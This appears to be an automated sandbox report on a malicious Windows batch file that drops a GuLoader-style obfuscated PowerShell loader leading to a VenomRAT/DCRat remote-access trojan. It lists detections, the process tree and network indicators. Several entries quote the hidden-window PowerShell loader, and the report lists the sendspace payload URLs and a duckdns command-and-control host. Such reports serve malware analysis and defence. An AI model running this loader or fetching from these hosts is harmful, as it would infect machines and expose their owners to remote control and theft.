Windows Analysis Report
las.cmd

Overview

General Information

Sample name: las.cmd
Analysis ID: 1446773
MD5: 1b315096e07f2cbe4bb1dae37bf115e5
SHA1: 183d4109803b7de7f8c679e5cf12d215bd6b3871
SHA256: e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728
Tags: cmd

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 3224 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6100 cmdline: powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);} [remainder of the obfuscated PowerShell command line omitted]" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5960 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7056 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);} [remainder of the obfuscated PowerShell command line omitted; identical to the PID 6100 command line]" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5800 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 6120 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author (matched strings listed under each row)
dump.pcap | Windows_Trojan_DCRat_1aeea1ac | unknown | unknown
  • 0xb55d0:$b2: DcRat By qwqdanchun1

Source | Rule | Description | Author (matched strings listed under each row)
00000006.00000002.2447508436.00000000086D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_DCRat_1aeea1ac | unknown | unknown
  • 0x2dcef:$b2: DcRat By qwqdanchun1
00000009.00000002.3255609581.0000000021160000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_DCRat_1aeea1ac | unknown | unknown
  • 0x34ef:$b2: DcRat By qwqdanchun1
  • 0x8317:$b2: DcRat By qwqdanchun1
  • 0x855b:$b2: DcRat By qwqdanchun1
00000006.00000002.2441971801.0000000005E95000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_DCRat_1aeea1ac | unknown | unknown
  • 0x132cf:$b2: DcRat By qwqdanchun1
Source | Rule | Description | Author (matched strings listed under each row)
amsi64_6100.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7056.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xe11b:$b2: ::FromBase64String(
  • 0xd1f6:$s1: -join
  • 0x69a2:$s4: +=
  • 0x6a64:$s4: +=
  • 0xac8b:$s4: +=
  • 0xcda8:$s4: +=
  • 0xd092:$s4: +=
  • 0xd1d8:$s4: +=
  • 0x1714b:$s4: +=
  • 0x171cb:$s4: +=
  • 0x17291:$s4: +=
  • 0x17311:$s4: +=
  • 0x174e7:$s4: +=
  • 0x1756b:$s4: +=
  • 0xd9c9:$e4: Get-WmiObject
  • 0xdbb8:$e4: Get-Process
  • 0xdc10:$e4: Start-Process
  • 0x15c69:$e4: Get-Process

System Summary

Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "[obfuscated PowerShell command line omitted; same as the PID 6100 entry in the process tree]"
Timestamp: 05/23/24-21:01:07.383835
SID: 2052265
Source Port: 8890
Destination Port: 62798
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/23/24-21:01:07.383835
SID: 2848152
Source Port: 8890
Destination Port: 62798
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:62796 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:62797 version: TLS 1.2
Source: Binary string: m.Core.pdb | source: powershell.exe, 00000006.00000002.2443760561.0000000007473000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb | source: powershell.exe, 00000006.00000002.2443760561.00000000074E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb | source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbL | source: powershell.exe, 00000006.00000002.2443760561.0000000007473000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdbk | source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb | source: powershell.exe, 00000006.00000002.2443760561.0000000007450000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

Networking

Source: Traffic | Snort IDS: 2052265 ET TROJAN Observed Malicious SSL Cert (VenomRAT) 12.202.180.134:8890 -> 192.168.2.5:62798
Source: Traffic | Snort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 12.202.180.134:8890 -> 192.168.2.5:62798
Source: unknown | DNS query: name: xvern429.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.5:62798 -> 12.202.180.134:8890
Source: Joe Sandbox View | IP Address: 69.31.136.17
Source: Joe Sandbox View | IP Address: 12.202.180.134
Source: Joe Sandbox View | IP Address: 172.67.170.105
Source: Joe Sandbox View | ASN Name: FISERV-INCUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /pro/dl/7yi2fu HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: fs03n4.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /pro/dl/lt00vw HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: fs03n3.sendspace.com | Connection: Keep-Alive | Cookie: SID=ns2pmla9s88ipijkujilaccdr6
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs03n4.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: fs03n3.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: xvern429.duckdns.org
Source: powershell.exe, 00000006.00000002.2437943823.0000000002F57000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: wab.exe, 00000009.00000002.3240674366.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000541F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wab.exe, 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enc
Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB5BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fs03n4.sendspace.com
Source: powershell.exe, 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2527053630.0000027AD97D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2438796376.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000021114000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2607346916.0000027AF1971000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB586000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000003.00000002.2527053630.0000027AD97D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2438796376.0000000004D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: wab.exe, 00000009.00000003.2435277716.0000000005437000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n3.sendspace.com/
Source: wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n3.sendspace.com/2
Source: wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJX
Source: wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fs03n3.sendspace.com/om:443
Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n4.sendspaX
Source: powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n4.sendspace.com
Source: powershell.exe, 00000003.00000002.2527053630.0000027AD9C64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027AD9C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB5A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB586000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n4.sendspace.com/dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea
Source: powershell.exe, 00000003.00000002.2527053630.0000027AD9C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs03n4.sendspace.comX
        Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000003.00000002.2527053630.0000027ADAC36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000003.00000002.2527053630.0000027AD99FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
        Source: wab.exe, 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
        Source: powershell.exe, 00000003.00000002.2527053630.0000027AD99FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/7yi2fuP
        Source: powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/7yi2fuXR
        Source: wab.exe, 00000009.00000002.3251440257.0000000020560000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2422890302.0000000005430000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/lt00vw
        Source: wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/lt00vw5
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62797
        Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:62796 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:62797 version: TLS 1.2

        System Summary

        Source: amsi32_7056.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000009.00000002.3255609581.0000000021160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: powershell.exe PID: 6100, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: wab.exe PID: 6120, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6540
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6564
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_024C2968 NtProtectVirtualMemory
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_024C2510 NtProtectVirtualMemory
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848F1B8C2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848F1AB16
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_024CC298
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_024C7610
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_024C7EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_024C1D98
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_024C72C8
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_024C2510
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_024C1D50
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_024C1D87
        Source: amsi32_7056.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000009.00000002.3255609581.0000000021160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: Process Memory Space: powershell.exe PID: 6100, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: wab.exe PID: 6120, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
        Source: classification engine Classification label: mal100.troj.evad.winCMD@13/9@6/3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Preaffirmative.Spo
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyvypyxf.wnr.ps1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6100
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7056
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% 